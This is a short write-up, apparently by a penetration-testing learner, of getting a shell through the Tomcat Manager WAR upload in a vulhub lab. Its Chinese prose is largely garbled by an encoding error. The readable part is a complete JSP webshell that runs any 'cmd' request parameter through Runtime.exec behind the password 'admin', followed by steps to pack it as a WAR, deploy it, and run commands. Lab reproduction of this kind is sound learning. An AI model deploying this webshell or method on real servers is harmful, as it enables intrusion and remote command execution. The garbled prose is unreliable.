鏄ㄥ効涓潰璇曡闂埌濡備綍閫氳繃tomcat鎷縮hell锛屼箣鍓嶅彧鏄湅鍒幫紝娌″仛杩囧鐜幫紝瀵艱嚧鑷繁鍚冧簡浜忥紝鍒氬叆娓楅€忎笉涔呫€傚鐜扮殑婕忔礊澶皯锛岀粡楠屾柟闈㈣繕鏄繙杩滀笉澶熺殑锛屼竴鐐逛竴鐐規潵銆傚鐜拌繃绋嬪彲鑳芥瘮杈冪矖绯欙紝鏈変粈涔堥敊璇繕甯屾湜鍚勪綅澶у摜缁欏皬寮熸寚鐐逛竴鐣€?
闈跺満鎼緩锛? 鐧懼害涓€涓嬶紝vulhub閲岃竟灏辨湁
婕忔礊澶嶇幇锛? 杩涘叆闈跺満锛屾壘鍒闆悗鍙般€傞粯璁ょ殑璇濇槸鍦╩anager
鍑嗗濂介┈锛屾墦鍖呮垚war鍖?
<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>涓€鍙ヨ瘽鏈ㄩ┈</title>
</head>
<body>
<%
if ("admin".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>
</html>
//ps锛氶┈鐨勫嚭澶勶細https://blog.csdn.net/Jerry____/article/details/103387763
鎵ц:jar -cvf [war鍖呭悕绉癩.war 鎵撳寘鐩綍
a.jsp 鐨勮瘽鏄竴鍙ヨ瘽鏈ㄩ┈锛屽ぇ瀹堕渶瑕佺殑璇濓紝鍙互鑷繁鎵句竴涓嬩竴浜涙湁鐢ㄧ殑椹紙鎴戞壘鐨勮繖涓┈涓嶅ソ鐢紝灏變笉鍋氳褰曚簡锛?
涓婁紶锛岄儴缃瞱ar鍖?
鍙互鐪嬪埌搴旂敤鍒楄〃宸茬粡鍑虹幇浜嗘垜浠殑鐩綍锛?
璁塊棶涓€涓嬶細whoami 鎴愬姛鍥炴樉锛屾紡娲炲鐜扮畻鏄垚鍔熶簡銆?
鏈変簺鍛戒護鏄洖鏄句笉浜嗙殑锛屽ぇ姒傛槸椹笉澶銆?
鐢ㄥ摜鏂媺鐢熸垚浜嗕竴涓猨sp涓€鍙ヨ瘽锛岄噸鏂伴儴缃詫紝鎴愬姛杩炴帴锛屾嬁鍒皊hell